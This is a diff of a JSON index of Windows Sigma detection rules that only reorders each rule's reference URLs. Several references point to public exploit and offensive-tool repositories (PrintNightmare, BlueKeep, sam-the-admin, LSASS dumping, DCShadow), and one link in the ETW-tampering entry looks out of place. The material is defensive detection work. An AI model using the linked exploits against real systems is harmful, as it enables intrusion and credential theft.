+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4728",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_group_modification_logging.yml"
 ],
 "tags": "No established tags"
@@ -6041,8 +6041,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml",
 "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g",
+ "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml"
 ],
 "tags": [
@@ -6099,9 +6099,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/fox-it/LDAPFragger",
 "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961",
 "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/",
- "https://github.com/fox-it/LDAPFragger",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml"
 ],
 "tags": [
@@ -6270,9 +6270,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2",
 "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d",
 "https://twitter.com/gentilkiwi/status/1003236624925413376",
- "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml"
 ],
 "tags": [
@@ -6338,8 +6338,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699",
 "https://twitter.com/matthewdunwoody/status/1352356685982146562",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scheduled_task_deletion.yml"
 ],
 "tags": [
@@ -6410,8 +6410,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616",
- "Live environment caused by malware",
 "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)",
+ "Live environment caused by malware",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml"
 ],
 "tags": [
@@ -7106,10 +7106,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html",
- "https://twitter.com/SecurityJosh/status/1283027365770276866",
 "https://twitter.com/Flangvik/status/1283054508084473861",
+ "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html",
 "https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8",
+ "https://twitter.com/SecurityJosh/status/1283027365770276866",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml"
 ],
 "tags": [
@@ -7388,9 +7388,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml",
- "https://github.com/topotam/PetitPotam",
 "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/",
+ "https://github.com/topotam/PetitPotam",
+ "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml"
 ],
 "tags": [
@@ -7423,8 +7423,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673",
 "https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4673",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_driver_loaded.yml"
 ],
 "tags": [
@@ -7799,8 +7799,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701",
 "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699",
+ "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml"
 ],
 "tags": [
@@ -7928,8 +7928,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/AdamTheAnalyst/status/1134394070045003776",
 "https://github.com/zerosum0x0/CVE-2019-0708",
+ "https://twitter.com/AdamTheAnalyst/status/1134394070045003776",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml"
 ],
 "tags": [
@@ -8160,10 +8160,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800",
- "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
 "https://www.cisecurity.org/controls/cis-controls-list/",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_workstation_was_locked.yml"
 ],
 "tags": "No established tags"
@@ -8214,15 +8214,15 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
- "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
- "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
 "https://twitter.com/_xpn_/status/1268712093928378368",
- "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
- "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
- "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
 "http://managed670.rssing.com/chan-5590147/all_p1.html",
+ "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
+ "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
 "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
+ "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
+ "https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
 "https://bunnyinside.com/?term=f71e8cb9c76a",
+ "https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml"
 ],
 "tags": [
@@ -8350,8 +8350,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/SBousseaden/status/1096148422984384514",
 "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx",
+ "https://twitter.com/SBousseaden/status/1096148422984384514",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml"
 ],
 "tags": [
@@ -8396,8 +8396,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://o365blog.com/post/hybridhealthagent/",
 "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml",
+ "https://o365blog.com/post/hybridhealthagent/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml"
 ],
 "tags": [
@@ -8601,8 +8601,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file",
 "https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml",
+ "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml"
 ],
 "tags": [
@@ -8626,8 +8626,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072",
 "https://twitter.com/duzvik/status/1269671601852813320",
+ "https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml"
 ],
 "tags": [
@@ -8718,9 +8718,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html",
 "https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf",
 "https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all",
+ "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml"
 ],
 "tags": [
@@ -8744,9 +8744,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://msdn.microsoft.com/en-us/library/cc220234.aspx",
 "https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/",
 "https://adsecurity.org/?p=3466",
- "https://msdn.microsoft.com/en-us/library/cc220234.aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml"
 ],
 "tags": [
@@ -8804,9 +8804,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/SBousseaden/status/1581300963650187264?",
- "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html",
 "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/",
+ "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html",
+ "https://twitter.com/SBousseaden/status/1581300963650187264?",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml"
 ],
 "tags": [
@@ -8874,9 +8874,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
 "https://www.sans.org/webcasts/119395",
 "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/",
- "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml"
 ],
 "tags": [
@@ -8967,10 +8967,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r",
- "https://twitter.com/gentilkiwi/status/1003236624925413376",
 "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2",
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662",
+ "https://twitter.com/gentilkiwi/status/1003236624925413376",
+ "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml"
 ],
 "tags": [
@@ -9157,8 +9157,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/malmoeb/status/1511760068743766026",
- "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py",
 "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py",
+ "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml"
 ],
 "tags": [
@@ -9349,8 +9349,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://goo.gl/PsqrhT",
 "https://twitter.com/JohnLaTwC/status/1004895028995477505",
+ "https://goo.gl/PsqrhT",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ntlm/win_susp_ntlm_auth.yml"
 ],
 "tags": [
@@ -9409,8 +9409,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/",
 "https://cyberpolygon.com/materials/okhota-na-ataki-ms-exchange-chast-2-cve-2020-0688-cve-2020-16875-cve-2021-24085/",
+ "https://www.trustedsec.com/blog/detecting-cve-20200688-remote-code-execution-vulnerability-on-microsoft-exchange-server/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_vul_cve_2020_0688.yml"
 ],
 "tags": [
@@ -9631,8 +9631,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://www.virustotal.com/gui/file/13828b390d5f58b002e808c2c4f02fdd920e236cc8015480fa33b6c1a9300e31",
- "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed",
 "https://www.virustotal.com/gui/file/5092b2672b4cb87a8dd1c2e6047b487b95995ad8ed5e9fc217f46b8bfb1b8c01",
+ "https://www.virustotal.com/gui/file/15b57c1b68cd6ce3c161042e0f3be9f32d78151fe95461eedc59a79fc222c7ed",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_av_relevant_match.yml"
 ],
 "tags": [
@@ -9745,8 +9745,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5",
 "https://technet.microsoft.com/en-us/library/security/4022344",
+ "https://bugs.chromium.org/p/project-zero/issues/detail?id=1252&desc=5",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_susp_msmpeng_crash.yml"
 ],
 "tags": [
@@ -9781,8 +9781,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
 "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/",
+ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_change.yml"
 ],
 "tags": [
@@ -9805,9 +9805,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf",
- "https://github.com/deepinstinct/Lsass-Shtinkering",
 "https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-erref/596a1078-e883-4972-9bbc-49e60bebca55",
+ "https://github.com/deepinstinct/Lsass-Shtinkering",
+ "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_werfault_susp_lsass_credential_dump.yml"
 ],
 "tags": [
@@ -9840,11 +9840,11 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/FlemmingRiis/status/1217147415482060800",
- "https://nullsec.us/windows-event-log-audit-cve/",
 "https://www.youtube.com/watch?v=ebmW42YYveI",
 "https://twitter.com/DidierStevens/status/1217533958096924676",
 "https://twitter.com/VM_vivisector/status/1217190929330655232",
+ "https://nullsec.us/windows-event-log-audit-cve/",
+ "https://twitter.com/FlemmingRiis/status/1217147415482060800",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_audit_cve.yml"
 ],
 "tags": [
@@ -9955,8 +9955,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
 "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/",
+ "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_xp_cmdshell_audit_log.yml"
 ],
 "tags": [
@@ -10002,9 +10002,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16",
 "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/",
 "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16",
+ "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml"
 ],
 "tags": [
@@ -10092,8 +10092,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/",
 "https://df-stream.com/2014/01/the-windows-7-event-log-and-usb-device/",
+ "https://www.techrepublic.com/article/how-to-track-down-usb-flash-drive-usage-in-windows-10s-event-viewer/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/driverframeworks/win_usb_device_plugged.yml"
 ],
 "tags": [
@@ -10117,8 +10117,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/nas_bench/status/1539679555908141061",
 "https://twitter.com/j00sean/status/1537750439701225472",
+ "https://twitter.com/nas_bench/status/1539679555908141061",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/diagnosis/scripted/win_diagnosis_scripted_load_remote_diagcab.yml"
 ],
 "tags": [
@@ -10141,8 +10141,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/SBousseaden/status/1483810148602814466",
 "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log",
+ "https://twitter.com/SBousseaden/status/1483810148602814466",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_attempted_dll_load.yml"
 ],
 "tags": [
@@ -10165,8 +10165,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/wdormann/status/1590434950335320065",
 "https://github.com/MicrosoftDocs/windows-itpro-docs/blob/40fe118976734578f83e5e839b9c63ae7a4af82d/windows/security/threat-protection/windows-defender-application-control/event-id-explanations.md#windows-codeintegrity-operational-log",
+ "https://twitter.com/wdormann/status/1590434950335320065",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/code_integrity/win_codeintegrity_blocked_driver_load.yml"
 ],
 "tags": [
@@ -10233,8 +10233,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/moti_b/status/1032645458634653697",
 "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5",
+ "https://twitter.com/moti_b/status/1032645458634653697",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml"
 ],
 "tags": [
@@ -10258,9 +10258,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/afwu/PrintNightmare",
- "https://twitter.com/KevTheHermit/status/1410203844064301056",
 "https://github.com/hhlxf/PrintNightmare",
+ "https://twitter.com/KevTheHermit/status/1410203844064301056",
+ "https://github.com/afwu/PrintNightmare",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_guest_logon.yml"
 ],
 "tags": [
@@ -10308,10 +10308,10 @@
 "logsource.product": "windows",
 "refs": [
 "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH",
+ "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx",
 "https://winaero.com/enable-openssh-server-windows-10/",
 "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16",
 "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse",
- "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml"
 ],
 "tags": [
@@ -10336,8 +10336,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/fuzzyf10w/status/1410202370835898371",
- "https://github.com/afwu/PrintNightmare",
 "https://github.com/hhlxf/PrintNightmare",
+ "https://github.com/afwu/PrintNightmare",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml"
 ],
 "tags": [
@@ -10405,8 +10405,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide",
 "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection",
+ "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml"
 ],
 "tags": [
@@ -10430,8 +10430,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/troubleshoot-windows-defender-antivirus",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_disabled.yml"
 ],
 "tags": [
@@ -10556,8 +10556,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus",
 "https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml"
 ],
 "tags": [
@@ -10670,8 +10670,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide",
 "https://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware",
+ "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_suspicious_features_tampering.yml"
 ],
 "tags": [
@@ -10719,8 +10719,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
 "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
+ "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
 "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
 "https://isc.sans.edu/diary/22264",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_direct_ip_access.yml"
@@ -10892,8 +10892,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
 "https://twitter.com/malmoeb/status/1535142803075960832",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml"
 ],
@@ -10963,8 +10963,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg",
 "https://ngrok.com/",
+ "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml"
 ],
 "tags": [
@@ -10997,9 +10997,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
 "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx",
 "https://twitter.com/gentilkiwi/status/861641945944391680",
+ "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_susp_dns_config.yml"
 ],
 "tags": [
@@ -11516,9 +11516,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
 "https://www.sans.org/webcasts/119395",
 "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/",
- "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_cobaltstrike_service_installs.yml"
 ],
 "tags": [
@@ -11588,8 +11588,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html",
- "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx",
 "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx",
+ "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config.yml"
 ],
 "tags": [
@@ -11682,8 +11682,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/zerosum0x0/CVE-2019-0708",
 "https://github.com/Ekultek/BlueKeep",
+ "https://github.com/zerosum0x0/CVE-2019-0708",
